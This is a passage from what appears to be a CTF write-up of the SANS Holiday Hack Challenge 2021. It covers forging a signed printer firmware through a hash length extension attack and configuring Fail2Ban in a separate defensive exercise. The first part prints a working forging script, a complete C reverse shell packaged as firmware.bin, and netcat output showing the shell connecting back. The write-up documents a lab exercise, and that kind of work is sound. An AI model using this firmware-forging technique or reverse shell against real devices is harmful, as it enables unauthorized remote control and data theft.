    &lt;span class="n"&gt;original_algorithm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;firmware_export&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;algorithm&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="n"&gt;secret_length&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;firmware_export&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;secret_length&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# We prepare our hash length extension attack&lt;/span&gt;
    &lt;span class="n"&gt;extender&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;hlextend&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;original_algorithm&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;lower&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
    &lt;span class="n"&gt;new_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;extender&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;extend&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_to_append_content&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;original_firmware&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;secret_length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;original_sig&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;raw&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;new_sig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;extender&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hexdigest&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# We encode our backdoored file&lt;/span&gt;
    &lt;span class="n"&gt;zip_value_encoded&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;b64encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;new_file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# We create our new firmware in JSON&lt;/span&gt;
    &lt;span class="n"&gt;firmware_json&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;secret_length&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;secret_length&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;algorithm&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;original_algorithm&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;firmware_json&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;firmware&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;zip_value_encoded&lt;/span&gt;
    &lt;span class="n"&gt;firmware_json&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;signature&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;new_sig&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dumps&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;firmware_json&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We'll first try our length extension attack with an innocuous ZIP file. Let's
ZIP up the &lt;code&gt;ls&lt;/code&gt; binary, and see what happens:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; zip -r ls.zip /bin/ls
&lt;span class="go"&gt;  adding: bin/ls (deflated 57%)&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ./forge.py
&lt;span class="go"&gt;usage: ./forge.py &amp;lt;firmware-export.json&amp;gt; &amp;lt;zip_file_to_append&amp;gt;&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ./forge.py firmware-export.json ls.zip &amp;gt; firmware-forge-ls.json
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now let's upload our forged firmware:&lt;/p&gt;
&lt;img alt="The web interface sends a different message. It reads: &amp;quot;Something went wrong! Firmware update failed. Failed to parse the ZIP file: Could not extract firmware.bin from the archive&amp;quot;. There's then a command output where we see that the printer tried to extract and execute a file called firmware.bin from our ZIP file, but it failed because there's no file called firmware.bin in our ZIP file." class="align-center" src="/images/sans-christmas-challenge-2021/printer_ls_zip.png" /&gt;
&lt;p&gt;Hurray, we passed the signature check! However, since there is no
&lt;code&gt;firmware.bin&lt;/code&gt; in our ZIP file, the update did not work. Now, we just
have to create a backdoor called &lt;code&gt;firmware.bin&lt;/code&gt;, and we should be good
to go:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cm"&gt;/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */&lt;/span&gt;
&lt;span class="cm"&gt;/* reverse_shell.c */&lt;/span&gt;

&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;netinet/in.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/types.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/socket.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;arpa/inet.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;&lt;/span&gt;

&lt;span class="cp"&gt;#define REMOTE_ADDR &amp;quot;IP_YOU_OWN&amp;quot;&lt;/span&gt;
&lt;span class="cp"&gt;#define REMOTE_PORT PORT_YOU_LISTEN_ON&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[])&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;sockaddr_in&lt;/span&gt; &lt;span class="n"&gt;sa&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;sa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sin_family&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;sa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sin_addr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;s_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;inet_addr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;REMOTE_ADDR&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;sa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sin_port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;htons&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;REMOTE_PORT&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SOCK_STREAM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;connect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;sockaddr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;sa&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sa&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="n"&gt;dup2&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;dup2&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;dup2&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;execve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/bin/sh&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; gcc -o firmware.bin reverse_shell.c
&lt;span class="go"&gt;reverse_shell.c: In function ‘main’:&lt;/span&gt;
&lt;span class="go"&gt;reverse_shell.c:29:5: warning: null argument where non-null required (argument 2) [-Wnonnull]&lt;/span&gt;
&lt;span class="go"&gt;   29 |     execve(&amp;quot;/bin/sh&amp;quot;, 0, 0);&lt;/span&gt;
&lt;span class="go"&gt;      |     ^~~~~~&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; zip -r reverse_shell.zip firmware.bin
&lt;span class="go"&gt;  adding: firmware.bin (deflated 83%)&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ./forge.py firmware-export.json reverse_shell.zip &amp;gt; firmware-forged-backdoor.json
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's upload our backdoor:&lt;/p&gt;
&lt;img alt="The web interface sends a success message: &amp;quot;Firmware successfully uploaded and validated! Executing the update package in the background&amp;quot;" class="align-center" src="/images/sans-christmas-challenge-2021/printer_backdoor.png" /&gt;
&lt;p&gt;Oh yeah! Now we check on our reverse shell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nc -nlvp &lt;span class="nv"&gt;$PORT&lt;/span&gt;
&lt;span class="go"&gt;Ncat: Version 7.70 ( https://nmap.org/ncat )&lt;/span&gt;
&lt;span class="go"&gt;Ncat: Listening on :::$PORT&lt;/span&gt;
&lt;span class="go"&gt;Ncat: Listening on 0.0.0.0:$PORT&lt;/span&gt;
&lt;span class="go"&gt;Ncat: Connection from 34.121.219.20.&lt;/span&gt;
&lt;span class="go"&gt;Ncat: Connection from 34.121.219.20:40030.&lt;/span&gt;
&lt;span class="go"&gt;python -c &amp;quot;import pty; pty.spawn(&amp;#39;/bin/bash&amp;#39;)&amp;quot;&lt;/span&gt;
&lt;span class="gp"&gt;app@44a226b5ae56:/app$&lt;/span&gt; grep &lt;span class="s1"&gt;&amp;#39;.xlsx&amp;#39;&lt;/span&gt; /var/spool/printer.log
&lt;span class="go"&gt;grep &amp;#39;.xlsx&amp;#39; /var/spool/printer.log&lt;/span&gt;
&lt;span class="go"&gt;Q4 Game Floor Earnings.xlsx&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Troll_Pay_Chart.xlsx&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The last printed &lt;code&gt;.xlsx&lt;/code&gt; file is called &lt;code&gt;Troll_Pay_Chart.xlsx&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-8"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id35"&gt;Objective 8:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="eve-snowshoes-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id36"&gt;Eve Snowshoes's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Jack is trying to break into Santa&amp;#39;s workshop!&lt;/span&gt;

&lt;span class="go"&gt;Santa&amp;#39;s elves are working 24/7 to manually look through logs, identify the&lt;/span&gt;
&lt;span class="go"&gt;malicious IP addresses, and block them. We need your help to automate this so&lt;/span&gt;
&lt;span class="go"&gt;the elves can get back to making presents!&lt;/span&gt;

&lt;span class="go"&gt;Can you configure Fail2Ban to detect and block the bad IPs?&lt;/span&gt;

&lt;span class="go"&gt; * You must monitor for new log entries in /var/log/hohono.log&lt;/span&gt;
&lt;span class="go"&gt; * If an IP generates 10 or more failure messages within an hour then it must&lt;/span&gt;
&lt;span class="go"&gt;   be added to the naughty list by running naughtylist add &amp;lt;ip&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;        /root/naughtylist add 12.34.56.78&lt;/span&gt;
&lt;span class="go"&gt; * You can also remove an IP with naughtylist del &amp;lt;ip&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;        /root/naughtylist del 12.34.56.78&lt;/span&gt;
&lt;span class="go"&gt; * You can check which IPs are currently on the naughty list by running&lt;/span&gt;
&lt;span class="go"&gt;        /root/naughtylist list&lt;/span&gt;

&lt;span class="go"&gt;You&amp;#39;ll be rewarded if you correctly identify all the malicious IPs with a&lt;/span&gt;
&lt;span class="go"&gt;Fail2Ban filter in /etc/fail2ban/filter.d, an action to ban and unban in&lt;/span&gt;
&lt;span class="go"&gt;/etc/fail2ban/action.d, and a custom jail in /etc/fail2ban/jail.d. Don&amp;#39;t&lt;/span&gt;
&lt;span class="go"&gt;add any nice IPs to the naughty list!&lt;/span&gt;

&lt;span class="go"&gt;*** IMPORTANT NOTE! ***&lt;/span&gt;

&lt;span class="go"&gt;Fail2Ban won&amp;#39;t rescan any logs it has already seen. That means it won&amp;#39;t&lt;/span&gt;
&lt;span class="go"&gt;automatically process the log file each time you make changes to the Fail2Ban&lt;/span&gt;
&lt;span class="go"&gt;config. When needed, run /root/naughtylist refresh to re-sample the log file&lt;/span&gt;
&lt;span class="go"&gt;and tell Fail2Ban to reprocess it.&lt;/span&gt;

&lt;span class="gp"&gt;root@66b263e0bc97:~#&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we need to write custom &lt;code&gt;fail2ban&lt;/code&gt; rules to block Jack from
attacking Santa's workshop. To do so, we're told to create:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;A custom filter in &lt;code&gt;/etc/fail2ban/filter.d&lt;/code&gt;. This filter will contain
the regular expressions used to match malicious entries and ignored entries
in our log file.&lt;/li&gt;
&lt;li&gt;A custom action in &lt;code&gt;/etc/fail2ban/action.d&lt;/code&gt;. This action will contain
commands to ban and unban IP addresses.&lt;/li&gt;
&lt;li&gt;A custom jail in &lt;code&gt;/etc/fail2ban/jail.d&lt;/code&gt;. This jail will take the path
to our log file, our custom filter, our custom action, and the parameters
to determine whether to block an IP or not (here, we're told that 10 failures
within an hour should warrant a block.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If we take a look at &lt;code&gt;/var/log/hohono.log&lt;/code&gt;, we see seven types of
messages:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Failure messages
- Failed login from &amp;lt;HOST&amp;gt; for &amp;lt;username&amp;gt;
- Login from &amp;lt;HOST&amp;gt; rejected due to unknown user name
- Invalid heartbeat &amp;lt;heartbeat&amp;gt; from &amp;lt;HOST&amp;gt;
- &amp;lt;HOST&amp;gt; sent a malformed request&lt;/li&gt;
&lt;li&gt;Success messages
- Valid heartbeat from &amp;lt;HOST&amp;gt;
- &amp;lt;HOST&amp;gt;: Request completed successfully
- Login from &amp;lt;HOST&amp;gt; successful&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can create our filter &lt;code&gt;/etc/fail2ban/filter.d/hohono.conf&lt;/code&gt; with the
following content:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;[Definition]&lt;/span&gt;
&lt;span class="na"&gt;failregex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;Failed login from &amp;lt;HOST&amp;gt; for .*&lt;/span&gt;
&lt;span class="s"&gt;            Login from &amp;lt;HOST&amp;gt; rejected due to unknown user name&lt;/span&gt;
&lt;span class="s"&gt;            Invalid heartbeat .* from &amp;lt;HOST&amp;gt;&lt;/span&gt;
&lt;span class="s"&gt;            &amp;lt;HOST&amp;gt; sent a malformed request&lt;/span&gt;
&lt;span class="na"&gt;ignoreregex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;Valid heartbeat from &amp;lt;HOST&amp;gt;&lt;/span&gt;
&lt;span class="s"&gt;              &amp;lt;HOST&amp;gt;: Request completed successfully&lt;/span&gt;
&lt;span class="s"&gt;              Login from &amp;lt;HOST&amp;gt; successful&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can test our regular expressions against the actual log file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;root@66b263e0bc97:~#&lt;/span&gt; fail2ban-regex /var/log/hohono.log /etc/fail2ban/filter.d/hohono.conf

&lt;span class="go"&gt;Running tests&lt;/span&gt;
&lt;span class="go"&gt;=============&lt;/span&gt;

&lt;span class="go"&gt;Use   failregex filter file : hohono, basedir: /etc/fail2ban&lt;/span&gt;
&lt;span class="go"&gt;Use         log file : /var/log/hohono.log&lt;/span&gt;
&lt;span class="go"&gt;Use         encoding : UTF-8&lt;/span&gt;


&lt;span class="go"&gt;Results&lt;/span&gt;
&lt;span class="go"&gt;=======&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;Failregex: 3851 total&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;|-  #) [# of hits] regular expression&lt;/span&gt;
&lt;span class="go"&gt;|   1) [956] Failed login from &amp;lt;HOST&amp;gt; for .*&lt;/span&gt;
&lt;span class="go"&gt;|   2) [916] Login from &amp;lt;HOST&amp;gt; rejected due to unknown user name&lt;/span&gt;
&lt;span class="go"&gt;|   3) [994] Invalid heartbeat .* from &amp;lt;HOST&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;|   4) [985] &amp;lt;HOST&amp;gt; sent a malformed request&lt;/span&gt;
&lt;span class="go"&gt;`-&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;Ignoreregex: 28482 total&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;|-  #) [# of hits] regular expression&lt;/span&gt;
&lt;span class="go"&gt;|   1) [9508] Valid heartbeat from &amp;lt;HOST&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;|   2) [9666] &amp;lt;HOST&amp;gt;: Request completed successfully&lt;/span&gt;
&lt;span class="go"&gt;|   3) [9308] Login from &amp;lt;HOST&amp;gt; successful&lt;/span&gt;
&lt;span class="go"&gt;`-&lt;/span&gt;

&lt;span class="go"&gt;Date template hits:&lt;/span&gt;
&lt;span class="go"&gt;|- [# of hits] date format&lt;/span&gt;
&lt;span class="go"&gt;|  [32333] {^LN-BEG}ExYear(?P&amp;lt;_sep&amp;gt;[-/.])Month(?P=_sep)Day(?:T|  ?)24hour:Minute:Second(?:[.,]Microseconds)?(?:\s*Zone offset)?&lt;/span&gt;
&lt;span class="go"&gt;`-&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;Lines: 32333 lines, 28482 ignored, 3851 matched, 0 missed&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;[processed in 3.30 sec]&lt;/span&gt;

&lt;span class="go"&gt;Ignored line(s): too many to print.  Use --print-all-ignored to print all 28482 lines&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we did not miss any line in our log file!&lt;/p&gt;
&lt;p&gt;Next, our custom action. We're told to use commands &lt;code&gt;/root/naughtylist
add&lt;/code&gt; and &lt;code&gt;/root/naughtylist del&lt;/code&gt; to ban or uban IP addresses. We can
create our action &lt;code&gt;/etc/fail2ban/action.d/hohono.conf&lt;/code&gt; with the following
content:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;[Definition]&lt;/span&gt;
&lt;span class="na"&gt;actionban&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;/root/naughtylist add &amp;lt;ip&amp;gt;&lt;/span&gt;
&lt;span class="na"&gt;actionunban&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;/root/naughtylist del &amp;lt;ip&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, we create our custom jail &lt;code&gt;/etc/fail2ban/jail.d/hohono.conf&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;[hohono]&lt;/span&gt;
&lt;span class="na"&gt;enabled&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="na"&gt;logpath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;/var/log/hohono.log&lt;/span&gt;
&lt;span class="c1"&gt;# number of failures to look for&lt;/span&gt;
&lt;span class="na"&gt;maxretry&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;10&lt;/span&gt;
&lt;span class="c1"&gt;# we want a one hour window&lt;/span&gt;
&lt;span class="na"&gt;findtime&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;3600&lt;/span&gt;
&lt;span class="na"&gt;filter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;hohono&lt;/span&gt;
&lt;span class="na"&gt;banaction&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;hohono&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We then reload &lt;code&gt;fail2ban&lt;/code&gt;'s configuration:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;root@66b263e0bc97:~#&lt;/span&gt; fail2ban-client reload
&lt;span class="go"&gt;OK&lt;/span&gt;
&lt;span class="gp"&gt;root@66b263e0bc97:~#&lt;/span&gt; fail2ban-client status
&lt;span class="go"&gt;Status&lt;/span&gt;
&lt;span class="go"&gt;|- Number of jail:      1&lt;/span&gt;
&lt;span class="go"&gt;`- Jail list:   hohono&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then we refresh the naughty list:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;root@66b263e0bc97:~#&lt;/span&gt; /root/naughtylist refresh
&lt;span class="go"&gt;Refreshing the log file...&lt;/span&gt;
&lt;span class="gp"&gt;root@66b263e0bc97:~#&lt;/span&gt; Log file refreshed! It may take fail2ban a few moments to re-process.

&lt;span class="go"&gt;214.176.63.173 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;163.152.99.43 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;174.174.81.230 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;46.43.167.137 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;184.242.117.119 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;171.141.80.137 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;35.220.156.225 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;222.177.169.253 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;154.189.209.70 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;188.141.185.1 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;126.143.139.119 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;173.165.146.7 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;42.98.4.139 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;42.150.175.243 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;114.132.137.115 has been added to the naughty list!&lt;/span&gt;
&lt;span class="go"&gt;You correctly identifed 15 IPs out of 15 bad IPs&lt;/span&gt;
&lt;span class="go"&gt;You incorrectly added 0 benign IPs to the naughty list&lt;/span&gt;




&lt;span class="go"&gt;*******************************************************************&lt;/span&gt;
&lt;span class="go"&gt;* You stopped the attacking systems! You saved our systems!&lt;/span&gt;
&lt;span class="go"&gt;*&lt;/span&gt;
&lt;span class="go"&gt;* Thank you for all of your help. You are a talented defender!&lt;/span&gt;
&lt;span class="go"&gt;*******************************************************************&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="kerberoasting-on-an-open-fire"&gt;
